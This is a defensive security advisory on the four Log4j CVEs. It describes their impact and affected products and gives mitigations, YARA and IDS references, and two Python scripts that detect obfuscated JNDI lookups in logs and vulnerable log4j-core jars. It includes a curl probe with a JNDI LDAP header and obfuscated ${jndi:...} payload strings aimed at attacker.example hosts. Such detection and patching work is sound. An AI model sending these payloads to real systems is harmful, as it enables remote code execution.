Vulnerability

Log4j v2.17.1: The Fourth CVE and the New Year's Countdown

RISK: CRITICAL

Last Update: December 30th 14:18 EST

CVE-2021-44832 – Fourth CVE. Remote code execution through a JDBC Appender whose data source is configured with a JNDI URI; it requires an attacker who can already modify the logging configuration file. Affects all versions from 2.0-beta7 to 2.17.0, excluding the security fix releases 2.3.2 and 2.12.4. Fixed in 2.17.1.

CVE-2021-45105 – Third CVE. Upgrade to 2.17.0: Log4j 2.16.0 does not always protect from infinite recursion in lookup evaluation, so when a non-default Pattern Layout uses a Context Lookup (for example $${ctx:loginId}), an attacker who controls Thread Context Map input can supply a self-referential lookup that ends in a StackOverflowError and terminates the process (denial of service).

CVE-2021-45046 – Second CVE. Upgrade to 2.16.0: the fix shipped in 2.15.0 was incomplete. Initially rated a limited DoS, it was later re-scored as critical because in certain non-default configurations (a Pattern Layout with a Context Lookup such as $${ctx:loginId}, or a Thread Context Map pattern) attackers controlling MDC input could still craft JNDI lookups, leading to information leak and, in some environments, remote code execution. 2.16.0 disables JNDI by default and removes message lookups entirely.

CVE-2021-44228 – Initial CVE (Log4Shell). Upgrade to 2.15.0, which disables JNDI message lookups by default, to fix remote code execution through attacker-controlled JNDI (LDAP) lookups in logged messages and parameters.

Description

The latest CVE does not pose an increased security risk for the majority of enterprises, because exploiting it requires permission to modify the logging configuration file. You should not ignore it, but in my opinion an attacker who can already edit your logging configuration gives you much bigger issues to worry about. We all know, for example, that anyone with access to Tomcat Manager can use the server to deploy malicious payloads directly.

The Apache Software Foundation says that in Apache Log4j2 versions 2.14.1 and earlier “JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”

Log4j2, the open-source logging framework for Java, does not protect against attacker-controlled JNDI endpoints: untrusted input that reaches a log message can trigger a lookup over LDAP, RMI or another JNDI provider, and the JVM will load and execute arbitrary code fetched from that untrusted source.

Cloudflare reports that it first saw exploitation attempts at 2021-12-01 04:36:50 UTC, which puts in-the-wild exploitation at least nine days before public disclosure, although some time after the issue had been reported to Apache.

Many Java-based applications could be exposed, because Log4j is a common dependency of the products listed below:

  • Apache Tomcat
  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

Historical CVE

  • CVE-2017-5645: In Apache Log4j 2.x before 2.8.2, the TCP and UDP socket servers used to receive serialized log events from other applications deserialize whatever they are sent. A specially crafted binary payload sent to such a server leads to arbitrary code execution when it is deserialized.
  • CVE-2019-17571: In Apache Log4j 1.2 (up to and including 1.2.17), the SocketServer class is vulnerable to deserialization of untrusted data, which leads to remote code execution when combined with a deserialization gadget on the classpath.

Detection of Vulnerable Services

Using a simple curl statement, replace "example.com" with a host you control (a DNS or LDAP listener) and point the request at the external or internal server you are testing. If that server is running a vulnerable version and logs the header, it will attempt the JNDI lookup and connect out to fetch the "a" object; the callback to your listener is the indicator, so the header name below is only an example and any field that ends up in a log message works. Nessus has also released a detection plugin, and a Python scanning script can be used as well.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://example.com/a}'

Known Mitigation Strategies

Update Log4j: fixed in versions 2.17.1 (Java 8 and later), 2.12.4 (Java 7) and 2.3.2 (Java 6).

Apache has officially published the details of the 2.17.1 release, and the same fix is back-ported as 2.12.4 and 2.3.2 for the older Java 7 and Java 6 release branches.

Next-Generation Firewall

  • Palo Alto users with an active Threat Prevention security subscription can automatically block sessions related to this vulnerability using Threat ID 91991 (initially released in Applications and Threats content update version 8498 and further enhanced in version 8499).
  • Fortinet has released IPS signature updates, with further information to follow.

F5 WAF Application Rules

  • https://support.f5.com/csp/article/K19026212

Snort and Suricata Rules

  • 2034647
  • 2034648
  • 2034649
  • 2034650
  • 2034651
  • 2034652
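Signature rules like the ones above look for the literal "${jndi:" string, but Log4j evaluates nested lookups before it decides whether to contact a JNDI endpoint, which is why attackers obfuscate the probe as "${${lower:j}ndi:...}", "${${::-j}ndi:...}" or "${${env:NOPE:-j}ndi:...}". The following Python script is an added example, not code from this page or from the Log4j project: it models the message lookup substitution described earlier (nested lookups resolved innermost-first, a case-insensitive prefix, ":-" defaults, and re-evaluation of a lookup's result) and runs it over constructed access-log lines to recover the JNDI target an attacker was aiming at. The MAX_DEPTH cap, the ctx dictionary standing in for the Thread Context Map, the sample log lines and the attacker.example hostnames are all assumptions made for the example; the self-referential ${ctx:apiVersion} value shows the runaway recursion behind CVE-2021-45105.

```python
import re

# Assumed recursion cap for this model; it stands in for the bound Log4j 2.17.0 added
# after CVE-2021-45105 showed that 2.16.0 could recurse until a StackOverflowError.
MAX_DEPTH = 20


class LookupRecursionError(Exception):
    """Raised when a lookup result keeps referring back to itself."""


class LookupEvaluator:
    """Minimal model of Log4j 2.x message lookup substitution (StrSubstitutor).

    Handles ${prefix:key:-default}, nested lookups (innermost first), a
    case-insensitive prefix, and re-evaluation of a lookup's result, which is the
    behaviour that makes both obfuscation and self-referential recursion work.
    Unknown prefixes (env, sys, date, ...) are treated as unresolvable so the
    model stays offline.
    """

    def __init__(self, ctx=None):
        self.ctx = ctx or {}      # stand-in for the Thread Context Map (MDC)
        self.jndi_targets = []    # every JNDI URI a vulnerable Log4j would contact

    def evaluate(self, text, depth=0):
        if depth > MAX_DEPTH:
            raise LookupRecursionError(text)
        out, _, _ = self._parse(text, 0, depth, nested=False)
        return out

    def _parse(self, s, i, depth, nested):
        buf = []
        while i < len(s):
            if s.startswith("${", i):
                inner, i, closed = self._parse(s, i + 2, depth, nested=True)
                buf.append(self._resolve(inner, depth) if closed else "${" + inner)
            elif nested and s[i] == "}":
                return "".join(buf), i + 1, True
            else:
                buf.append(s[i])
                i += 1
        return "".join(buf), i, False

    def _resolve(self, inner, depth):
        body, default = (inner.split(":-", 1) + [None])[:2]
        prefix, _, key = body.partition(":")
        prefix = prefix.lower()   # Log4j lowercases the prefix, so ${jNdI:...} works
        if prefix == "lower":
            value = key.lower()
        elif prefix == "upper":
            value = key.upper()
        elif prefix == "jndi":
            self.jndi_targets.append(key)
            return "<jndi:%s>" % key   # real Log4j would perform the JNDI lookup here
        elif prefix == "ctx":
            value = self.ctx.get(key)
        else:
            value = None
        if value is None:
            if default is None:
                return "${" + inner + "}"    # unresolved lookups are left as-is
            value = default
        return self.evaluate(value, depth + 1)   # lookup results are evaluated again


def find_jndi_lookups(line, ctx=None):
    """Return (jndi_targets, hit_recursion_limit) for one log line."""
    ev = LookupEvaluator(ctx)
    try:
        ev.evaluate(line)
    except LookupRecursionError:
        return ev.jndi_targets, True
    return ev.jndi_targets, False


def scan_lines(lines, ctx=None):
    """One alert per line that would trigger a JNDI lookup or runaway recursion."""
    alerts = []
    for n, line in enumerate(lines, 1):
        targets, recursed = find_jndi_lookups(line, ctx)
        if targets or recursed:
            alerts.append({"line": n, "jndi": targets, "recursion": recursed})
    return alerts


# Constructed sample access-log lines (not real traffic). The first is what the
# curl probe on this page produces once the header lands in a log message.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}${::-d}ap://attacker.example/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://attacker.example:1099/c}"',
    '10.0.0.8 - - "GET /docs/jndi HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${ctx:apiVersion}"',
]

# Constructed MDC value that refers back to itself: the CVE-2021-45105 recursion case.
SAMPLE_CTX = {"apiVersion": "${ctx:apiVersion}"}

if __name__ == "__main__":
    for alert in scan_lines(SAMPLE_LOG_LINES, SAMPLE_CTX):
        print(alert)
```

Running the script flags lines 1, 2, 3 and 5: the three obfuscated probes all normalise to the same two JNDI targets, line 4 (which merely mentions "jndi" in a URL path) is ignored, and line 5 only becomes an alert when the self-referential context value is present, which is the configuration-dependent nature of the third CVE. Feed real access logs in place of SAMPLE_LOG_LINES to hunt for probes that slipped past a literal-string signature.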

Outbound Traffic

  • Disable all outbound traffic from application servers to the internet as a general best practice: the Log4Shell exploit only works if the server can reach the attacker's LDAP or RMI endpoint to fetch its payload, so egress filtering breaks the attack even on an unpatched host (allow DNS only through a resolver you control, since lookups can also leak data over DNS). Use layered security, with a WAF at the edge plus IPS detection, to provide two layers of defence against attacks of this nature.

Detection Methods

Yara Scanner

Download the following rules

signature-base/expl_log4j_cve_2021_44228.yar at master · Neo23x0/signature-base

Download Yara Scanner

https://github.com/VirusTotal/yara/releases/download/v4.1.3/yara-v4.1.3-1755-win64.zip

Command

yara -r expl_log4j_cve_2021_44228.yar .

Loki Scanner

Releases · Neo23x0/Loki

Binary Scanner

GitHub – logpresso/CVE-2021-44228-Scanner: Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
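The version check in the mitigation section and the binary scanner above only help if you know where log4j-core actually lives, including copies buried inside WAR files and fat JARs. The following Python script is an added example, not code from this page or from the logpresso project: it walks a directory tree, opens every jar/war/ear, descends into nested archives, reads the log4j-core version from its Maven pom.properties, checks for the JndiLookup class (the Apache advisory's stopgap was to delete that class from the jar), and compares the version against the fixed releases 2.17.1, 2.12.4 and 2.3.2 named on this page. The sample jars it scans are constructed in a temporary directory with only the two entries the scanner reads, so nothing here is a real Log4j artifact, and the status labels are this example's own.

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# Fixed releases named on this page: 2.17.1 (Java 8+), 2.12.4 (Java 7), 2.3.2 (Java 6).
FIXED_MAIN = (2, 17, 1, 0)
FIXED_BRANCHES = {(2, 3): (2, 3, 2, 0), (2, 12): (2, 12, 4, 0)}


def parse_version(text):
    """'2.17.1' -> (2, 17, 1, 0); '2.0-beta9' -> (2, 0, 0, -1). Pre-releases sort below releases."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?$", text.strip())
    if not m:
        return None
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0), -1 if tag else 0)


def classify(version):
    """Compare a log4j-core version against the fixed releases for CVE-2021-44832."""
    v = parse_version(version)
    if v is None:
        return "unknown"
    if v[0] < 2:
        return "log4j-1.x-eol"   # end of life; see CVE-2019-17571 above
    fixed = FIXED_BRANCHES.get((v[0], v[1]), FIXED_MAIN)
    return "fixed" if v >= fixed else "vulnerable"


def assess(version, has_lookup):
    status = classify(version) if version else "unknown"
    if status == "vulnerable" and not has_lookup:
        # JndiLookup.class stripped from the jar: JNDI lookups are gone, but the
        # version is still old (CVE-2021-45105/44832 are unaffected), so upgrade anyway.
        status = "mitigated-jndi-only"
    return status


def inspect_archive(fileobj, label):
    """Report log4j-core hits in one archive, descending into nested jars/wars."""
    findings = []
    try:
        zf = zipfile.ZipFile(fileobj)
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_lookup = JNDI_LOOKUP_CLASS in names
        if has_lookup or version is not None:
            findings.append({"archive": label, "version": version,
                             "jndi_lookup_class": has_lookup,
                             "status": assess(version, has_lookup)})
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(inspect_archive(io.BytesIO(zf.read(name)), label + "!" + name))
    return findings


def scan_tree(root):
    """Walk a directory tree and inspect every jar/war/ear found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as f:
                    findings.extend(inspect_archive(f, label))
    return findings


def _zip_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _fake_log4j_core(version, with_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar holding only the entries the scanner reads."""
    entries = {POM_PROPERTIES: "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version}
    if with_lookup:
        entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe"   # placeholder bytes, not a real class
    return _zip_bytes(entries)


def build_demo_tree(root):
    """Write constructed sample archives (not real Log4j) under root."""
    samples = {
        "lib/log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1"),
        "lib/log4j-core-2.17.1.jar": _fake_log4j_core("2.17.1"),
        "lib/log4j-core-2.12.2-patched.jar": _fake_log4j_core("2.12.2", with_lookup=False),
        "webapps/service.war": _zip_bytes({"WEB-INF/lib/log4j-core-2.16.0.jar": _fake_log4j_core("2.16.0")}),
        "lib/unrelated.jar": _zip_bytes({"com/example/App.class": b"\xca\xfe\xba\xbe"}),
    }
    for rel, data in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)


def run_demo():
    """Scan the constructed tree and return sorted (archive, version, status) triples."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return sorted((f["archive"], f["version"], f["status"]) for f in scan_tree(root))


if __name__ == "__main__":
    for row in run_demo():
        print(row)
```

Point scan_tree at a real application root (for example a Tomcat installation) instead of the demo tree; the archive label uses "!" to show the path inside a nested WAR, which is where most missed copies turn up. Note that a jar with JndiLookup.class removed is reported separately rather than as fixed, because that stopgap does nothing for the recursion and JDBC Appender issues.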

Conclusions

We continue to see critical CVEs in application services, from ManageEngine (CVE-2021-44515) to the Exchange Server zero-day attacks. Let's ask the tough enterprise questions:

  • Is your corporation following security best practices?
  • Is your perimeter protected by a next-generation firewall with active IPS blocking enabled?
  • Is your application layer protected by an enterprise-grade WAF?
  • Do you know whether Apache Struts or Log4j is present on your network? Do you keep an active inventory of the external applications and libraries your enterprise has published on the internet?
  • Are you proactively patching, and can you run emergency patches when needed?

Reference Links

Known IOC

  • https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
  • https://logging.apache.org/log4j/2.x/security.html